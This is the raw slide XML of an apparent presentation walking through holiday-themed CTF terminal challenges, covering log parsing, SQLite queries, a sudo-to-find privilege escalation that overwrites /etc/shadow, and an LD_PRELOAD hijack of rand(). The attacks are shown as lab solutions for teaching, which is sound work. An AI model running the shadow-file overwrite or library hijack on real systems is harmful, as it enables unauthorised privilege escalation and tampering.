          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Bumbles Bounce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21728"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> |grep GET | cut -d ' ' -f 12 | sort -n | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uniq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c | sort -n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from results several had a count of  '1', but keyword in question was least popular 'browser'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12289" name="Picture 1" descr="lf@a2905b3209cbw$ cat access. log &#10;—n &#10;-n &#10;lgrep GET I éut &#10;• -f 12 &#10;I sort &#10;I uniq &#10;sort &#10;&quot;DiU0/3.ø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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="263047" y="2619504"/>
            <a:ext cx="5200525" cy="40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f@2905b32øgcbw$ Is &#10;access. log &#10;runtoanswer &#10;elf@a2905b3209cbw$ runtoanswer &#10;Starting up, please w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371" y="3682990"/>
            <a:ext cx="5583839" cy="181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7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Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SugarPlum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mary -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dont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> think were in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kansas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>anymore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66" y="2249487"/>
            <a:ext cx="4507836" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem- Information in SQLite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2" descr="ugarplum Mary is in a tizzy, we hope you can assist. &#10;Christmas songs abound, with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77" y="1208251"/>
            <a:ext cx="4935255" cy="532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9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Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SugarPlum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mary -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dont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> think were in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kansas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>anymore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718" y="1678488"/>
            <a:ext cx="5073041" cy="4734837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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Found sqlite3 running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.tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>found 2 tables likes, songs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.schema likes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.schema songs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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.sqlitetutorial.net/sqlite-group-by/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songid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, COUNT(like) FROM likes GROUP BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>songid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ORDER BY COUNT (like);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>top song with likes is SONG ID:392, with 11325 likes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265|2140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245|2162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392|11325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SELECT id, title FROM songs GROUP BY id;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>392| Stairway to Heaven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 2" descr="85 ISnowbound For Christmas &#10;3861snowfa11 &#10;387 IS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18" y="1127343"/>
            <a:ext cx="4042293" cy="356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q lite&gt; . quit &#10;ch ristmassongs. db &#10;runtoanswer &#10;./runtoanswer &#10;Starting up, please wait.... .. &#10;Enter the name o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4897677"/>
            <a:ext cx="4797468" cy="18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Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shinny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Upatree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- O wait maybe we are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gs &#10;My name is Shinny Upatree, and I've made a big mistake. &#10;I fear it's worse than the time I served e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51" y="1628383"/>
            <a:ext cx="10413120" cy="455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6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Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shinny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Upatree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- O wait maybe we are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152" y="1522977"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: Not a root user, but has SUDO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16385" name="Picture 1" descr="udo -1 &#10;Matching Defaults entries for elf on 21c67d1d61bf: &#10;env_reset, mail_badpass, &#10;User elf may run the follow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13" y="2705622"/>
            <a:ext cx="106584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23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0748"/>
            <a:ext cx="10332429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Terminal- shinny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Upatree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> - O wait maybe we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t /etc/sudoers &#10;This file MUST be edited with the 'visudo• command as root. &#10;Please consider ad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94" y="1381003"/>
            <a:ext cx="7778664" cy="52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1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16925"/>
            <a:ext cx="9905999" cy="3974276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once a year in December </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Holiday Themed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free to participate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simulated environment to exploit and solve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>puzzles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Roughly 9,000 players this year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>oughly170 completed all challenges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830" y="142529"/>
            <a:ext cx="10445162" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terminal- shinny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Upatree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - O wait maybe we are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830" y="881814"/>
            <a:ext cx="9311830" cy="5353301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ll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-g shadow find /*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shadow.bak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/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>find</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>found it can execute a command with -exec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-g shadow find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shadow.bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '{}' /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/shadow \;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cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/local/bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inspect_da_box</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18433" name="Picture 1" descr="lfceef124a68b41 : &#10;elfceef124a68b41: &#10;elfceef124a68b41•. &#10;/etc$ sudo -g shadow find &#10;/etc$ cd /usr/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376" y="3700191"/>
            <a:ext cx="7227517" cy="294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2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 err="1" smtClean="0"/>
              <a:t>OpenSlae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47406"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem- Make binary always return 42, when executed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19460" name="Picture 4" descr="gs &#10;Wunorse Opens tae has a special challenge for you. &#10;Run the given binary, make it return 42. &#10;16: 59 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64" y="1941534"/>
            <a:ext cx="7807835" cy="46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 err="1" smtClean="0"/>
              <a:t>OpenSlae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35712"/>
            <a:ext cx="9905999" cy="35417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482" name="Picture 2" descr="at isit42.c.un &#10;include &lt;stdio. &#10;// DATA CORRUPTION ERROR &#10;// MUCH OF THIS CODE HAS BEEN LOST &#10;// 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732" y="1635712"/>
            <a:ext cx="7207789" cy="48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smtClean="0"/>
              <a:t>Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenSlae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35712"/>
            <a:ext cx="9905999" cy="35417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482" name="Picture 2" descr="at isit42.c.un &#10;include &lt;stdio. &#10;// DATA CORRUPTION ERROR &#10;// MUCH OF THIS CODE HAS BEEN LOST &#10;// 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15" y="1197301"/>
            <a:ext cx="7771460" cy="52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17477"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenSlae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313" y="1134669"/>
            <a:ext cx="9905999" cy="5471404"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/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cat isit42.c.un</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>found this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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 err="1"/>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jm.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/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pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rand(unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> microseconds) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("Hijacked rand!\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>return 42;}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jm.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -shared -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fPIC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LD_PRELOAD="$PWD/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" ./isit42 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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17477"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenSlae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313" y="1134669"/>
            <a:ext cx="9905999" cy="410120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3554" name="Picture 2" descr="at jm.c &#10;include &lt;stdio. &#10;unsigned int rand(unsigned int microseconds) { &#10;print f (&quot;Hijacked rand!\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29" y="1277375"/>
            <a:ext cx="6775038" cy="188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c jm.c —o jm —shared —fPIC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29" y="3221818"/>
            <a:ext cx="6775038" cy="39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eif@ddbc436808d5w$ &#10;./isit42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0" y="3921352"/>
            <a:ext cx="6775038" cy="33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lf@ddbc436808d5w$ &#10;Starting up &#10;. done. &#10;Calling rand() to select a random number. &#10;Hijacked rand! &#10;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65" y="2943616"/>
            <a:ext cx="4822784" cy="375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Unlock and Collect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sz="3200" dirty="0"/>
              <a:t>Terminal Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Snowball Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>CTF Objectives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286" y="0"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Snowball Challenge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3" y="1258785"/>
            <a:ext cx="5739747" cy="5285486"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14341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09" y="0"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Snowball Challenges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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152014" y="1187532"/>
            <a:ext cx="9088071" cy="5438898"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39357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Snowball </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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06286"/>
            <a:ext cx="9905999" cy="5058887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Snowball Challenges unlock achievements , pages of the Great Book, and tools for future Snowball Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem : They are time consuming, complicated, and a pain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution: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Complete the 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and easiest snowball challenge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 Burp to proxy traffic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Replay traffic, change flags, and use to complete all snowball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35494"/>
            <a:ext cx="9905999" cy="40557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Testing system (Most likely Kali)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Cloud Sever (Not behind a firewall)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Variety of Free Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Burp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>SMBclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-U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194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Snowball Challenge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6" y="1205437"/>
            <a:ext cx="9007101" cy="5212620"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18828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Snowball Challenge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63" y="1240085"/>
            <a:ext cx="8512696" cy="4938629"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836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Snowball Challenge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36" y="1294410"/>
            <a:ext cx="8421474" cy="5019305"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32135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Unlock and Collect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sz="3200" dirty="0"/>
              <a:t>Terminal Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Snowball Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>CTF Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64104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29" y="1104406"/>
            <a:ext cx="7647710" cy="53201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1) Visit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>North Pole and Beyond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> at the Winter Wonder Landing Level to collect the first page of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> using a giant snowball. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What is the title of that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>page?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Solved in Terminal Challenge 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My name is Bushy Evergreen, and I have a problem for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>you.I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> think a server got owned, and I can only offer a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clue.We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> use the system for chat, to keep toy production </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>running.Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> you help us recover from the server connection shunning?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find and run the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>elftalkd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> binary to complete this challenge.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24578" name="Picture 2" descr="bout •rjts &#10;bis tome is ibe work of a successive group of anony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673" y="2208811"/>
            <a:ext cx="3365176" cy="430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2- apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>STRuts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1478570"/>
            <a:ext cx="11818776" cy="5047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2) Investigate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Letters to Santa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>application at  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://l2s.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
